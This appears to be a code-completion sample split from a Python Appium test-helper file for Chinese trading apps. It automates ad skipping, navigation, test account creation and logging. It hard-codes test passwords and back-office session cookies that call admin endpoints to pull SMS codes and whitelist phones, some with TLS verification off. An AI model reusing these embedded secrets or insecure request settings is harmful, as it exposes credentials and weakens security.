}
Remote_url = 'http://localhost:4723/wd/hub'
#檢查app是否安裝,若沒安裝則自動安裝
def check_app_installed():
driver_install = webdriver.Remote(Remote_url, desired_install)
if(driver_install.is_app_installed(desired_caps['appPackage'])):
print('APP已經安裝')
else:
driver_install.install_app(apk_url)
print('APP安裝完畢')
driver_install.quit()
#跳過廣告
def skip_ads(self):
time.sleep(12)
#1.跳過開屏廣告 2.關版本升級 3.關彈窗廣告
#沒有彈出版本升級或廣告就跳過不執行
element_list = [package_name+':id/tv_skip',package_name+':id/btn_cancel',package_name+':id/close_btn']
for element in element_list:
try:
self.driver.find_element_by_id(element).click()
except NoSuchElementException:
continue
#跳過廣告(不等開屏七秒)
def skip_ads_no_wait(self):
#設置隱性等待2秒
self.driver.implicitly_wait(2)
#1.跳過開屏廣告 2.關版本升級 3.關彈窗廣告
#沒有彈出版本升級或廣告就跳過不執行
element_list = [package_name+':id/tv_skip',package_name+':id/btn_cancel',package_name+':id/close_btn']
for element in element_list:
try:
self.driver.find_element_by_id(element).click()
except NoSuchElementException:
continue
self.driver.implicitly_wait(10)
#跳過文字彈窗
def skip_pop_ups_dialog(self):
try:
#點擊文字彈窗
self.driver.find_element_by_xpath("//*[@text='立即前往']").click()
time.sleep(2)
#關閉文字彈窗H5
self.driver.find_element_by_id(package_name+":id/title_left_secondary_icon").click()
except NoSuchElementException:
pass
#點允許(在app內時)
def click_allow(self):
try:
self.driver.find_element_by_xpath("//*[@text='允許']").click()
print('點擊允許')
except NoSuchElementException:
print('允許未跳出')
#點允許(不在app內時)
def click_allow_outside_app():
driver_allow = webdriver.Remote(Remote_url, desired_install)
try:
driver_allow.find_element_by_xpath("//*[@text='允許']").click()
print('點擊允許')
except NoSuchElementException:
print('允許未跳出')
driver_allow.quit()
#點擊我的頁面
def press_my_button(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#點擊座標
TouchAction(self.driver).tap(element=None, x=x*0.9, y=y-1, count=1).perform()
#element = self.driver.find_element_by_id('com.gwtsz.gts2.cf:id/radio_button_text').find_element_by_xpath("//*[@text='我的']")
#element.click()
#行情tab
def click_quotation(self):
element = self.driver.find_element_by_xpath("/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/androidx.recyclerview.widget.RecyclerView/android.widget.RelativeLayout[2]/android.widget.LinearLayout/android.widget.ImageView")
element.click()
#交易tab
def click_transaction(self):
element = self.driver.find_element_by_xpath("/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/androidx.recyclerview.widget.RecyclerView/android.widget.RelativeLayout[3]/android.widget.LinearLayout/android.widget.ImageView")
element.click()
#取得真實帳號資訊
def get_account_information(self):
#點我頁面TAB(Parameter)
press_my_button(self)
#點我頁面登入頭像
self.driver.find_element_by_id(package_name+":id/iv_me_head_icon").click()
#取得帳號
account_num = self.driver.find_element_by_id(package_name+":id/dialog_content_text2").text
#取得帳號級別
account_lvl = self.driver.find_element_by_id(package_name+":id/dialog_content_text3").text
self.driver.find_element_by_xpath("//*[@text='知道了']").click()
return account_num,account_lvl
#取得模擬帳號資訊
def get_demo_account_information(self):
#點我頁面TAB(Parameter)
press_my_button(self)
#點我頁面登入頭像
self.driver.find_element_by_id(package_name+":id/iv_me_head_icon").click()
#取得帳號
account_num = self.driver.find_element_by_id(package_name+":id/dialog_content_text2").text
self.driver.find_element_by_xpath("//*[@text='知道了']").click()
return account_num
#關閉分享彈窗
def close_share_window(self):
self.driver.find_element_by_id(package_name+":id/btn_cancel").click()
#點擊首頁消息中心
def click_home_message_center(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#點擊座標
TouchAction(self.driver).tap(element=None, x=x*0.81 ,y=y/19, count=1).perform()
#透過id
#self.driver.find_element_by_id('com.szoc.zb.cs:id/message_btn2').click()
#點擊首頁客服中心
def click_home_customer_service(self):
#透過id
#self.driver.find_element_by_id(package_name+':id/contact_btn2').click()
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#點擊座標
TouchAction(self.driver).tap(element=None, x=x*0.93 ,y=y/19, count=1).perform()
#點擊我頁面設置
def click_mypage_setting(self):
self.driver.find_element_by_id(package_name+":id/iv_user_center_setting").click()
#點擊我頁面消息中心
def click_mypage_message_center(self):
self.driver.find_element_by_id(package_name+":id/iv_user_center_message").click()
#點擊消息中心的返回
def click_message_center_return(self):
el2 = self.driver.find_element_by_xpath("/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.RelativeLayout/android.widget.LinearLayout/android.widget.LinearLayout/android.widget.LinearLayout/android.widget.RelativeLayout/android.widget.LinearLayout[1]/android.widget.ImageView")
el2.click()
#點擊我頁面在線客服
def click_mypage_customer_service(self):
self.driver.find_element_by_id(package_name+":id/rl_user_center_live").click()
#點擊我頁面切換真實模擬
def click_mypage_switch_account(self):
self.driver.find_element_by_id(package_name+":id/tv_real_demo_switch").click()
#點擊我頁面存款
def click_mypage_deposit(self):
self.driver.find_element_by_id(package_name+":id/tv_me_main_deposit").click()
#點擊我頁面取款
def click_mypage_withdraw(self):
self.driver.find_element_by_id(package_name+":id/tv_me_main_withdraw").click()
#點擊我頁面資金明細
def click_mypage_funding_details(self):
self.driver.find_element_by_xpath("//*[@text='资金明细']").click()
#點擊首頁
def press_home_tab(self):
self.driver.find_element_by_xpath("//*[@text='首页']").click()
#點擊首頁輪播廣告
def click_home_banner(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
for i in range(3):
#點擊座標
TouchAction(self.driver).tap(element=None, x=x/2 ,y=y/5, count=1).perform()
#點擊首頁登入/註冊
def click_home_register_login(self):
#做標定位只適用螢幕大小 2340*1080
#TouchAction(self.driver).tap(x=931, y=2149).perform()
#文字定位全部適用,但定位時間較久
self.driver.find_element_by_xpath("//*[@text='登录/注册']").click()
def click_home_real_account(self):
#TouchAction(self.driver).tap(x=750, y=1300).perform()
while True:
try:
#點擊首頁開立真實賬戶
self.driver.find_element_by_id(package_name + ":id/tv_open_two").click()
break
except NoSuchElementException:
#登出+回到首頁
Logout(self)
press_home_tab(self)
skip_ads(self)
def click_home_demo_account(self):
#TouchAction(self.driver).tap(x=250, y=1300).perform()
while True:
try:
#點擊首頁開立模擬賬戶
self.driver.find_element_by_id(package_name + ":id/tv_open_one").click()
break
except NoSuchElementException:
#登出+回到首頁
Logout(self)
press_home_tab(self)
skip_ads(self)
#點擊開戶
def click_login_create_account(self):
self.driver.find_element_by_id(package_name+":id/open_account_button").click()
#點擊模擬開戶
def click_create_demo_account(self):
self.driver.find_element_by_id(package_name+":id/main_top_right_tab").click()
#關閉H5
def close_html5(self):
#關閉H5
self.driver.find_element_by_id(package_name+":id/title_left_secondary_icon").click()
#往下滑
def scroll_down(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
x1=x/2
y1=y*0.8
y2=y*0.3
#TouchAction(self.driver).press(x=x1, y=y1).move_to(x=x1, y=y2).release().perform()
self.driver.swipe(x1,y1,x1,y2,1000)
#懂你所需左滑
def clever_need_swipe_left(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#懂你所需
coordinates = self.driver.find_element_by_id(package_name+':id/home_clever_need').location
y1 = coordinates['y'] + y/10
x1 = x*0.72
x2 = x*0.6
self.driver.swipe(x1,y1,x2,y1,1000)
#懂你所需右滑
def clever_need_swipe_right(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#懂你所需
coordinates = self.driver.find_element_by_id(package_name+':id/home_clever_need').location
y1 = coordinates['y'] + y/10
x2 = x*3/4
x1 = x/4
self.driver.swipe(x1,y1,x2,y1,1000)
#隨機產生密碼
def generate_random_password(self):
chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqstuvwxyz0123456789'
length = len(chars) - 1
random_password = ''
for i in range(random.randint(6,8)):
random_password+=chars[random.randint(0,length)]
random_password+=str(random.randint(0,9))
return random_password
#隨機產生電話
def random_phone_number(self):
area_list = ['130', '131', '132', '133', '134', '135', '136', '137',
'138', '139', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159','188','189']
numbers = '0123456789'
random_phone = random.choice(area_list)
for i in range(8):
random_phone+=numbers[random.randint(0,9)]
return random_phone
#隨機產生中文名
def random_chinese_name(self):
#隨機中文名
random_name = '測試'
for i in range(2):
random_name += chr(random.randint(0x4e00, 0x9fbf))
return random_name
#產生身分證API
'''def user_id_card_api(self):
request_url = "https://www.googlespeed.cn/idcard/ajax_get_idcard"
years = str(random.randint(1940,2001))
month = str(random.randint(1,12))
days = str(random.randint(1,30))
if(len(month)==1):
month = '0'+month
if(len(years)==1):
years = '0'+years
if(len(days)==1):
days = '0'+days
payload = {'sex': random.choice(['男','女']),
'year': years,
'month': month,
'day': days}
response = requests.request("POST", request_url, headers={}, data = payload)
data = response.json()
return data['id_list'][0]['id_card']'''
#獲取驗證碼API
def register_demo_account_api(self,random_phone):
if(package_name == 'com.szoc.zb.cs'):
request_url = "http://mis.will68.com/ValidateCodeLog/createValidateNo"
payload = random_phone
headers = {
'Cookie': '_ga=GA1.1.280281216.1603264849; _ga_DR6HQD5SM3=GS1.1.1604370924.4.0.1604370929.0; JSESSIONID=6E3FAB6D7BD7F37DC94282001269EB03; lang_type=0; cf88_id="user:1:3dce2613-06a3-45b3-ad00-6ba6f75d79a3"',
'Content-Type': 'text/plain'
}
response = requests.request("POST", request_url, headers=headers, data = payload)
data = response.json()
#回傳驗證碼
return data['data']
else:
request_url = "https://office.cf139.com/ValidateCodeLog/createValidateNo"
payload = random_phone
headers = {
'Connection': 'close',
'authority': 'office.cf139.com',
'accept': 'application/json, text/plain, */*',
'user-agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1',
'content-type': 'application/json;charset=UTF-8',
'origin': 'https://office.cf139.com',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': 'https://office.cf139.com/home/validater/validateNo',
'accept-language': 'zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7',
'cookie': 'lang_type=0; JSESSIONID=84871DBC50AD6CCE38923B5F4F7FC5DF; cf88_id="user:763:869480c1-ce0e-4232-9a65-65b9336b2cec"'
}
response = requests.request("POST", request_url, headers=headers, data = payload,verify = False)
#print(response.text.encode('utf8'))
data = response.json()
#回傳驗證碼
return data['data']
#添加白名單API
def White_List_API(self,random_phone):
if(package_name == 'com.szoc.zb.cs'):
request_url = "http://mis.will68.com/whitelists/edit"
payload = "{\"status\": 1, \"phone\": \""+random_phone+"\"}"
headers = {
'Cookie': '_ga=GA1.1.280281216.1603264849; _ga_DR6HQD5SM3=GS1.1.1604370924.4.0.1604370929.0; lang_type=0; JSESSIONID=C3883C50852D325D183B1E41F2DC8EF3; cf88_id="user:1:e7b99c9d-3916-461a-8d2d-975f7eeb18d7"',
'Content-Type': 'application/json'
}
response = requests.request("POST", request_url, headers=headers, data = payload)
data = response.json()
print('添加白名單結果為:',data['msg'])
else:
request_url = "https://office.cf139.com/whitelists/edit"
seconds = str(int(time.time()))
#payload = "{\"status\":1,\"remark\":\"YoYo-自動測試\",\"phone\":\""+random_phone+"\"}"
payload = "{\"phone\":\""+random_phone+"\",\"createTime\":1608542350760,\"ip\":\"\",\"updateTime\":"+seconds+",\"remark\":\"YoYo-自動測試\",\"id\":1593,\"idNumber\":\"\",\"email\":\"\",\"status\":1}"
headers = {
'authority': 'office.cf139.com',
'accept': 'application/json, text/plain, */*',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
'content-type': 'application/json;charset=UTF-8',
'origin': 'https://office.cf139.com',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': 'https://office.cf139.com/home/whitelist/index',
'accept-language': 'zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7',
'cookie': 'JSESSIONID=B9F4F676CC7B8728FF5EB497C6CA6FF1; cf88_id="user:763:99919735-b166-41db-bc21-fdd84d0c6734"; lang_type=0'
}
response = requests.request("POST", request_url, headers=headers, data = payload.encode("utf-8").decode("latin1"),verify = False)
#print(response.text.encode('utf8'))
data = response.json()
#回傳驗證碼
return data['data']
#登入
def Login(self):
try:
#點登錄註冊
click_home_register_login(self)
el1 = self.driver.find_element_by_id(package_name+":id/loginnameEditText")
el1.clear()
el1.send_keys(main_user_id)
el2 = self.driver.find_element_by_id(package_name+":id/password")
el2.clear()
el2.send_keys(main_user_password)
el3 = self.driver.find_element_by_id(package_name+":id/sign_in_button")
el3.click()
#跳廣告
skip_ads_no_wait(self)
except NoSuchElementException:
print('已登入...\n')
#登出
def Logout(self):
#切至我的頁面
press_my_button(self)
#點擊設置
el1 = self.driver.find_element_by_id(package_name+":id/iv_user_center_setting")
el1.click()
#退出登錄
el2 = self.driver.find_element_by_xpath("//*[@text='退出登录']")
el2.click()
#確認
el3 = self.driver.find_element_by_id(package_name+":id/action_btn_pos")
el3.click()
def check_new_account_login(self,account_type,password,random_phone):
#當前時間
current_time = datetime.now().isoformat()
if(account_type=='真實'):
try:
#點立擊體驗
self.driver.find_element_by_xpath("//*[@text='立即体验']").click()
#跳過廣告(不等開屏七秒)
skip_ads_no_wait(self)
#抓取帳號資訊(Parameter)
account_num,account_lvl = get_account_information(self)
print('開戶成功!帳號為:'+account_num,'級別為:'+account_lvl)
except NoSuchElementException:
print('錯誤!開戶後無法正常進入登入後畫面')
raise AssertionError('錯誤!開戶後無法正常進入登入後畫面')
# 讀取預約表(方便寫入資料)
with open(account_csv, newline='',encoding="utf-8") as csvfile:
#讀取預約表內容並存入writed_csv
rows = csv.reader(csvfile)
writed_csv = list(rows)
#寫入(新增帳號資訊)
with open(account_csv, 'w', newline='',encoding="utf-8") as csvfile:
writer = csv.writer(csvfile)
#寫入[帳號,手機,密碼,真實/模擬,帳戶等級,當前時間,包名]
account_information = [account_num,random_phone,password,account_type,account_lvl,current_time,package_name]
writed_csv.append(account_information)
# 寫入CSV
writer.writerows(writed_csv)
else:
try:
#點立擊體驗
self.driver.find_element_by_xpath("//*[@text='立即体验']").click()
#跳過廣告(不等開屏七秒)
skip_ads_no_wait(self)
#抓取帳號資訊(Parameter)
account_num = get_demo_account_information(self)
print('開戶成功!帳號為:'+account_num)
except NoSuchElementException:
print('錯誤!開戶後無法正常進入登入後畫面')
raise AssertionError('錯誤!開戶後無法正常進入登入後畫面')
# 讀取預約表(方便寫入資料)
with open(account_csv, newline='',encoding="utf-8") as csvfile:
#讀取預約表內容並存入writed_csv
rows = csv.reader(csvfile)
writed_csv = list(rows)
#寫入(新增帳號資訊)
with open(account_csv, 'w', newline='',encoding="utf-8") as csvfile:
writer = csv.writer(csvfile)
#寫入[帳號,手機,密碼,真實/模擬,帳戶等級,當前時間,包名]
account_information = [account_num,random_phone,password,account_type,'',current_time,package_name]
writed_csv.append(account_information)
#寫入CSV
writer.writerows(writed_csv) | 'deviceName':'Mi 9t',
'appPackage': package_name,
'appActivity':'gw.com.android.ui.WelcomeActivity',
'newCommandTimeout':6000, | random_line_split |
Parameter.py | # -*- coding: utf-8 -*-
import unittest
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException
from random import Random
from datetime import datetime
import unittest, time, re, os
import json
import requests
import csv
random = Random()
#=========UAT/PRD切換測試需更改之參數========
# 指定OS
OS = 'Windows'
#UAT
#package_name = 'com.szoc.zb.cs'
#PRD
#package_name = 'com.gwtsz.gts2.cf'
#cf2
package_name = 'com.gwtsz.gts2.cf2'
#cf3
#package_name = 'com.gwtsz.gts2.cf3'
#專案目錄
dir_path = os.path.dirname(os.path.realpath(__file__))
#包為PRD
if(package_name == 'com.gwtsz.gts2.cf'):
#指定apk路徑
apk_url = dir_path + '/release-cf-1.8.5-release_185_jiagu_sign_zp.apk'
#應用名稱&版本號(用於關於我們檢查)
app_name_version_expect = '创富CFD V_1.8.5'
#關於創富(用於關於創富檢查)
about_us_expect = '关于创富'
#登入帳戶
main_user_id = '81135805'
main_user_demo_id = '11092003'
main_user_password = 'abc123'
#包為UAT
elif(package_name == 'com.szoc.zb.cs'):
#指定apk路徑
apk_url = dir_path + '/2021-02-17-uat-cs-1.8.6-release.apk'
#應用名稱&版本號(用於關於我們檢查)
app_name_version_expect = 'ISTONE V_1.8.3'
#關於創富(用於關於創富檢查)
about_us_expect = '关于神龙科技'
#登入帳戶
main_user_id = '81018322'
main_user_demo_id = '11002074'
main_user_password = 'abc123'
#包為CF2
elif(package_name == 'com.gwtsz.gts2.cf2'):
#指定apk路徑
apk_url = dir_path + '/20201120-prd-cf2-1.8.3-release.apk'
#應用名稱&版本號(用於關於我們檢查)
app_name_version_expect = '柯洛夫黃金平台 V_1.8.6'
#關於創富(用於關於創富檢查)
about_us_expect = '关于创富'
#登入帳戶
main_user_id = '81134740'
main_user_demo_id = '11092003'
main_user_password = 'abc123'
#包為CF3
else:
# 指定apk路徑
apk_url = dir_path + 'release-cf3-1.8.5-release_185_jiagu_sign_zp-update&utm_medium=bycfd.apk'
# 應用名稱&版本號(用於關於我們檢查)
app_name_version_expect = '白银交易平台 V_1.8.5'
# 關於創富(用於關於創富檢查)
about_us_expect = '关于创富'
# 登入帳戶
main_user_id = '81134740'
main_user_demo_id = '11092003'
main_user_password = 'abc123'
#=========UAT/PRD切換測試需更改之參數========
account_csv = '帳號列表.csv'
#指定舊版本apk路徑(覆蓋安裝測試)
#old_apk_url = 'C:/Users/Angela/72apptest/20200812-uat-cs-1.8.2-release.apk'
#指定裝置、版本、安裝包
#每次開啟不重置app
desired_caps = {
#'platformName':'Android',
#'platformVersion':'5.1.1',
#'deviceName':'Android Emulator',
'platformName':'Android',
'platformVersion':'10',
'deviceName':'Mi 9t',
'appPackage': package_name,
'appActivity':'gw.com.android.ui.WelcomeActivity',
'newCommandTimeout':6000,
'noReset':True
}
#每次開啟重置app
desired_caps_reset = {
'platformName':desired_caps['platformName'],
'platformVersion':desired_caps['platformVersion'],
'deviceName':desired_caps['deviceName'],
'appPackage':desired_caps['appPackage'],
'appActivity':desired_caps['appActivity'],
'newCommandTimeout':desired_caps['newCommandTimeout'],
'noReset':False
}
#不啟動app,開桌面
desired_install = {
'platformName':desired_caps['platformName'],
'platformVersion':desired_caps['platformVersion'],
'deviceName':desired_caps['deviceName'],
}
Remote_url = 'http://localhost:4723/wd/hub'
#檢查app是否安裝,若沒安裝則自動安裝
def check_app_installed():
driver_install = webdriver.Remote(Remote_url, desired_install)
if(driver_install.is_app_installed(desired_caps['appPackage'])):
print('APP已經安裝')
else:
driver_install.install_app(apk_url)
print('APP安裝完畢')
driver_install.quit()
#跳過廣告
def skip_ads(self):
time.sleep(12)
#1.跳過開屏廣告 2.關版本升級 3.關彈窗廣告
#沒有彈出版本升級或廣告就跳過不執行
element_list = [package_name+':id/tv_skip',package_name+':id/btn_cancel',package_name+':id/close_btn']
for element in element_list:
try:
self.driver.find_element_by_id(element).click()
except NoSuchElementException:
continue
#跳過廣告(不等開屏七秒)
def skip_ads_no_wait(self):
#設置隱性等待2秒
self.driver.implicitly_wait(2)
#1.跳過開屏廣告 2.關版本升級 3.關彈窗廣告
#沒有彈出版本升級或廣告就跳過不執行
element_list = [package_name+':id/tv_skip',package_name+':id/btn_cancel',package_name+':id/close_btn']
for element in element_list:
try:
self.driver.find_element_by_id(element).click()
except NoSuchElementException:
continue
self.driver.implicitly_wait(10)
#跳過文字彈窗
def skip_pop_ups_dialog(self):
try:
#點擊文字彈窗
self.driver.find_element_by_xpath("//*[@text='立即前往']").click()
time.sleep(2)
#關閉文字彈窗H5
self.driver.find_element_by_id(package_name+":id/title_left_secondary_icon").click()
except NoSuchElementException:
pass
#點允許(在app內時)
def click_allow(self):
try:
self.driver.find_element_by_xpath("//*[@text='允許']").click()
print('點擊允許')
except NoSuchElementException:
print('允許未跳出')
#點允許(不在app內時)
def click_allow_outside_app():
driver_allow = webdriver.Remote(Remote_url, desired_install)
try:
driver_allow.find_element_by_xpath("//*[@text='允許']").click()
print('點擊允許')
except NoSuchElementException:
print('允許未跳出')
driver_allow.quit()
#點擊我的頁面
def press_my_button(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#點擊座標
TouchAction(self.driver).tap(element=None, x=x*0.9, y=y-1, count=1).perform()
#element = self.driver.find_element_by_id('com.gwtsz.gts2.cf:id/radio_button_text').find_element_by_xpath("//*[@text='我的']")
#element.click()
#行情tab
def click_quotation(self):
element = self.driver.find_element_by_xpath("/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/androidx.recyclerview.widget.RecyclerView/android.widget.RelativeLayout[2]/android.widget.LinearLayout/android.widget.ImageView")
element.click()
#交易tab
def click_transaction(self):
element = self.driver.find_element_by_xpath("/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/androidx.recyclerview.widget.RecyclerView/android.widget.RelativeLayout[3]/android.widget.LinearLayout/android.widget.ImageView")
element.click()
#取得真實帳號資訊
def get_account_information(self):
#點我頁面TAB(Parameter)
press_my_button(self)
#點我頁面登入頭像
self.driver.find_element_by_id(package_name+":id/iv_me_head_icon").click()
#取得帳號
account_num = self.driver.find_element_by_id(package_name+":id/dialog_content_text2").text
#取得帳號級別
account_lvl = self.driver.find_element_by_id(package_name+":id/dialog_content_text3").text
self.driver.find_element_by_xpath("//*[@text='知道了']").click()
return account_num,account_lvl
#取得模擬帳號資訊
def get_demo_account_information(self):
#點我頁面TAB(Parameter)
press_my_button(self)
#點我頁面登入頭像
self.driver.find_element_by_id(package_name+":id/iv_me_head_icon").click()
#取得帳號
account_num = self.driver.find_element_by_id(package_name+":id/dialog_content_text2").text
self.driver.find_element_by_xpath("//*[@text='知道了']").click()
return account_num
#關閉分享彈窗
def close_share_window(self):
self.driver.find_element_by_id(package_name+":id/btn_cancel").click()
#點擊首頁消息中心
def click_home_message_center(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#點擊座標
TouchAction(self.driver).tap(element=None, x=x*0.81 ,y=y/19, count=1).perform()
#透過id
#self.driver.find_element_by_id('com.szoc.zb.cs:id/message_btn2').click()
#點擊首頁客服中心
def click_home_customer_service(self):
#透過id
#self.driver.find_element_by_id(package_name+':id/contact_btn2').click()
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#點擊座標
TouchAction(self.driver).tap(element=None, x=x*0.93 ,y=y/19, count=1).perform()
#點擊我頁面設置
def click_mypage_setting(self):
self.driver.find_element_by_id(package_name+":id/iv_user_center_setting").click()
#點擊我頁面消息中心
def click_mypage_message_center(self):
self.driver.find_element_by_id(package_name+":id/iv_user_center_message").click()
#點擊消息中心的返回
def click_message_center_return(self):
el2 = self.driver.find_element_by_xpath("/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.RelativeLayout/android.widget.LinearLayout/android.widget.LinearLayout/android.widget.LinearLayout/android.widget.RelativeLayout/android.widget.LinearLayout[1]/android.widget.ImageView")
el2.click()
#點擊我頁面在線客服
def click_mypage_customer_service(self):
self.driver.find_element_by_id(package_name+":id/rl_user_center_live").click()
#點擊我頁面切換真實模擬
def click_mypage_switch_account(self):
self.driver.find_element_by_id(package_name+":id/tv_real_demo_switch").click()
#點擊我頁面存款
def click_mypage_deposit(self):
self.driver.find_element_by_id(package_name+":id/tv_me_main_deposit").click()
#點擊我頁面取款
def click_mypage_withdraw(self):
self.driver.find_element_by_id(package_name+":id/tv_me_main_withdraw").click()
#點擊我頁面資金明細
def click_mypage_funding_details(self):
self.driver.find_element_by_xpath("//*[@text='资金明细']").click()
#點擊首頁
def press_home_tab(self):
self.driver.find_element_by_xpath("//*[@text='首页']").click()
#點擊首頁輪播廣告
def click_home_banner(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
for i in range(3):
#點擊座標
TouchAction(self.driver).tap(element=None, x=x/2 ,y=y/5, count=1).perform()
#點擊首頁登入/註冊
def click_home_register_login(self):
#做標定位只適用螢幕大小 2340*1080
#TouchAction(self.driver).tap(x=931, y=2149).perform()
#文字定位全部適用,但定位時間較久
self.driver.find_element_by_xpath("//*[@text='登录/注册']").click()
def click_home_real_account(self):
#TouchAction(self.driver).tap(x=750, y=1300).perform()
while True:
try:
#點擊首頁開立真實賬戶
self.driver.find_element_by_id(package_name + ":id/tv_open_two").click()
break
except NoSuchElementException:
#登出+回到首頁
Logout(self)
press_home_tab(self)
skip_ads(self)
def click_home_demo_account(self):
#TouchAction(self.driver).tap(x=250, y=1300).perform()
while True:
try:
#點擊首頁開立模擬賬戶
self.driver.find_element_by_id(package_name + ":id/tv_open_one").click()
break
except NoSuchElementException:
#登出+回到首頁
Logout(self)
press_home_tab(self)
skip_ads(self)
#點擊開戶
def click_login_create_account(self):
self.driver.find_element_by_id(package_name+":id/open_account_button").click()
#點擊模擬開戶
def click_create_demo_account(self):
self.driver.find_element_by_id(package_name+":id/main_top_right_tab").click()
#關閉H5
def close_html5(self):
#關閉H5
self.driver.find_element_by_id(package_name+":id/title_left_secondary_icon").click()
#往下滑
def scroll_down(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
x1=x/2
y1=y*0.8
y2=y*0.3
#TouchAction(self.driver).press(x=x1, y=y1).move_to(x=x1, y=y2).release().perform()
self.driver.swipe(x1,y1,x1,y2,1000)
#懂你所需左滑
def clever_need_swipe_left(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#懂你所需
coordinates = self.driver.find_element_by_id(package_name+':id/home_clever_need').location
y1 = coordinates['y'] + y/10
x1 = x*0.72
x2 = x*0.6
self.driver.swipe(x1,y1,x2,y1,1000)
#懂你所需右滑
def clever_need_swipe_right(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#懂你所需
coordinates = self.driver.find_element_by_id(package_name+':id/home_clever_need').location
y1 = coordinates['y'] + y/10
x2 = x*3/4
x1 = x/4
self.driver.swipe(x1,y1,x2,y1,1000)
#隨機產生密碼
def generate_random_password(self):
chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqstuvwxyz0123456789'
length = len(chars) - 1
random_password = ''
for i in range(random.randint(6,8)):
random_password+=chars[random.randint(0,length)]
random_password+=str(random.randint(0,9))
return random_password
#隨機產生電話
def random_phone_number(self):
area_list = ['130', '131', '132', '133', '134', '135', '136', '137',
'138', '139', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159','188','189']
numbers = '0123456789'
random_phone = random.choice(area_list)
for i in range(8):
random_phone+=numbers[random.randint(0,9)]
return random_phone
#隨機產生中文名
def random_chinese_name(self):
#隨機中文名
random_name = '測試'
for i in range(2):
random_name += chr(random.randint(0x4e00, 0x9fbf))
return random_name
#產生身分證API
'''def user_id_card_api(self):
request_url = "https://www.googlespeed.cn/idcard/ajax_get_idcard"
years = str(random.randint(1940,2001))
month = str(random.randint(1,12))
days = str(random.randint(1,30))
if(len(month)==1):
month = '0'+month
if(len(years)==1):
years = '0'+years
if(len(days)==1):
days = '0'+days
payload = {'sex': random.choice(['男','女']),
'year': years,
'month': month,
'day': days}
response = requests.request("POST", request_url, headers={}, data = payload)
data = response.json()
return data['id_list'][0]['id_card']'''
#獲取驗證碼API
def register_demo_account_api(self,random_phone):
if(package_name == 'com.szoc.zb.cs'):
request_url = "http://mis.will68.com/ValidateCodeLog/createValidateNo"
payload = random_phone
headers = {
'Cookie': '_ga=GA1.1.280281216.1603264849; _ga_DR6HQD5SM3=GS1.1.1604370924.4.0.1604370929.0; JSESSIONID=6E3FAB6D7BD7F37DC94282001269EB03; lang_type=0; cf88_id="user:1:3dce2613-06a3-45b3-ad00-6ba6f75d79a3"',
'Content-Type': 'text/plain'
}
response = requests.request("POST", request_url, headers=headers, data = payload)
data = response.json()
#回傳驗證碼
return data['data']
else:
request_url = "https://office.cf139.com/ValidateCodeLog/createValidateNo"
payload = random_phone
headers = {
'Connection': 'close',
'authority': 'office.cf139.com',
'accept': 'application/json, text/plain, */*',
'user-agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1',
'content-type': 'application/json;charset=UTF-8',
'origin': 'https://office.cf139.com',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': 'https://office.cf139.com/home/validater/validateNo',
